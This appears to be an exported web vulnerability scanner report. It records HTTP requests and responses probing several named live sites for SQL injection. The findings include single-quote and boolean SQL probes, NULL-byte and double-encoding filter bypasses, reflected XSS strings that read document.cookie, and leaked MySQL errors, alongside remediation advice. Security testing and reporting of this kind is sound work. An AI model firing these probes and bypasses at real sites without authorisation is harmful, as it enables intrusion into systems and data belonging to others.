GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00'&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:49 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXe99hdD4N3Y8+hAWrbEPZjNgAYyxYDc25rnr3Ff/Paa9/v3eI79FPXJcaLozQcxdpm5MM6R4QaC6sE5VMlIyysjvzjIeQkglG+XihWzhr/fZli1zObbtcS6mSLQnjk03OgIAQN4xIi4OAGyaxsr2pmtcoIEdVFMLG1qU2DWdhwqZmSygSSW8QGDuC4HGJ0b/Z2L9NCigN44ppkm4HdKHuVwsMzOoS0f2BaGqdksKsUKux/kFVZeyXFieCY/ZQRCiGwnaR6ImPRDQS/lIoW6dtX5Qz5Rb81Og0A9uKOao57Q3ndpPaWNj96D/Lo5ssIaeclFQKZRjkZp2ArR9KuWy9vUbLvuxpGH6lkiTumvPM+RUBP96mw5RFlxP8EylO52TSis8TgwolY5Gg3BfKaaG0W/FJaYc.s/MiCuIckIOrG8DkvWNfiA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:49 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19194
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,pc-test.co ...[SNIP]... O15H5daRJPBlH%2FSbzIHiQCsWSZWkQSTw3AHBTGHo9g6qLtBS5%2BaQXf3HvBBTCB%2ByzTytycqPwU82LaNRsvca1NL910pVw7nc3TO1IgGGuIAO2uYw&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00''&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:55 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJYTl4xB5DzWnjJsxKS7Ikiy5zkR+OaoC5I4yrnSj0IzYFdv/5xkL34IVVlNI21A6Tll5JhicLyDKsXHxiXt4czGm74ULKBQKIhvH/MR7vSf4QYfI2D5z9rB2Z3FWtfyCSbFkg+/5YfV1UiWFk065BW3/iEtfbUHQgfa9AKUmjhlaZ2g+R9ESfr/p556qQovpllZTUTJc0F++uYsY8Qk74sYaMk4USrbAjv+COiS68qoNWkMd/guT/ktJJLZK/zrOCBhqAsXvLRkFzPadj/K2xMcHN4dWHFZRV3BZrZ7bKC2RKEgmZiD+RwRBcENkbrDf3CJdWjceNmKAHA1/k22otNyfLQCaXrzBtVKb/Nbf1GV3oX1jQecjjMYUMcgxTopHYlTEQGKtzjJDEuSJES3gfiMRKJ/PD9kTDzerHB1s+qOnBw==.cHhmyQbUSBnRfZHEv3/FmA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:55 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19123
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c ...[SNIP]...
The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00'&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:04:49 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/Sk5qAFuhB59X9RSLW7ckHfTilfUr8ib+dgOlCrfN8tBICvndkUjF0Z+nHc1Lu4MJAEmuf7fLy0i4/wwCbQ43hc1E5Er3lpKWuO/mo+YDpjuTx8UIUKda73Ece3P1hlb0MyAv+2UILn776mpHuBjjtlJIkhqRnLQogXCoP6wqyg/QYisThsxwzalEcKONAJg6KntPTEiekOflooJTJsgje4dXFcK4GtVRgajUVRJhm6zbs8vkT3bFy7fNreAZbQsODCkNqyvvHTc94Y+NA959gf/JzitgbxCcNwVNfxNri8JxaY7PCzU5dyij/M3kpdjVBtH7+04yzwdOpkFzAIbk7QAbXG1n0fEjPpKQsDR6NlY3bvEorfyuWFdrnGpIZMd0Mxt80tQUktKfdRUkiIEoYWSGPR/VnmmZkRiG0ClYYOSGCk82bO8hxXVKcQqKWQpoX87MkSKH1vk6DJtibEwzhPf3oN3buTIaLqG8mMkFaxQi4eHZC8UhWRY40re9E=.DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]... PVs1K%2FWWKWj4SRWLTkFgHujJpdV3XGBUvGGVmufLsEHrxN1BF2EdMXYmwkjrUFCb6pj6q7cCdZ4w2lI6oh8%2B3wzEBnV6r0jlsUnfMFgXF14JaLfo%3D&template=v1-450xauto">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00''&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:04:49 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc= ...[SNIP]... .DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The flash parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the flash parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d1--%20 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://tipd.com/register Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 06 Feb 2011 13:52:27 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2974
GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\ ...[SNIP]... = c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; jca=(9507)-(226)-(558); if (a=='aw0') {jca+=(-2656);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BTHHnm6dOTbqFD4yGlgfFoMSFCe3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtzjS3LqvtxHXPNaIwJ9eTNc2wsz4Q\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" 
height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});
Request 2
GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d2--%20 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://tipd.com/register Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 06 Feb 2011 13:52:28 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 3045
GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\ ...[SNIP]... = c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; sv=String.fromCharCode(55,57,49,54,57,53,56,57,53); sv=sv.slice(1,5); jca=(-4875)+parseInt(sv); if (a=='aw0') {jca+=(2350);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BdkO2nKdOTaGyEur7lQfYuJSaA-3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtwm2_nbgUzu0V6hHIJj95ks7G-P4A\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" 
height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /FXM/iview/211419853/direct;wi.125;hi.125/01?click= HTTP/1.1 Host: redacted Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13%2527 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6126 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 06 Feb 2011 16:31:57 GMT
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aboutus.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:47 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 209
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aboutus.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /aboutus.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:47 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.11. http://www.baysideeyes.com.au/aboutus.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.baysideeyes.com.au
Path: /aboutus.htm
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aboutus.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:34 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /aboutus.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:37 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin'/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
